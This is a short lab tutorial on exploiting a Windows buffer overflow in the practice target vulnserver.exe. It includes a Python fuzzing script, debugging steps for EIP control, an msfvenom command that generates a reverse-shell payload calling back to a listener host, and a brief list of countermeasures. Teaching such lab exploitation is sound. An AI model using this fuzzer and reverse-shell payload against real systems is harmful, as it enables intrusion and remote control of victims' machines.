Windows-Based Buffer Overflow Attack

Overview

This document details the exploitation of a vulnerable Windows executable. We use a fuzzing script, analyze crashes, and inject shellcode.

1. Setting Up a Vulnerable Windows Application

We target vulnserver.exe, an intentionally vulnerable program for exploitation practice. Download from: https://github.com/stephenbradshaw/vulnserver

Run vulnserver.exe on a Windows VM.
Attach Immunity Debugger to monitor crashes.

2. Fuzzing with Python (`fuzz.py`)

import socket

target_ip = "192.168.1.100"  # Replace with your Windows VM's IP
target_port = 9999

buffer = b"A" * 1000  # Adjust length

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target_ip, target_port))
s.send(buffer)
s.close()

print("Sent fuzzing payload.")

Run it:

python3 fuzz.py

3. Debugging the Crash

Attach Immunity Debugger.
Identify EIP control (modify execution flow).
Inject custom shellcode (e.g., reverse shell).

4. Exploit Development

Once EIP overwrite is confirmed, generate shellcode using msfvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.200 LPORT=4444 -b "\x00\x0A" -f python

Modify exploit to inject shellcode and take control of execution.

5. Countermeasures

Use DEP (Data Execution Prevention).
Implement ASLR (Address Space Layout Randomization).
Use stack canaries to detect buffer overflows.

PreviousBuffer Overflow Vulnerability NextMan-in-the-Middle (MITM) Attack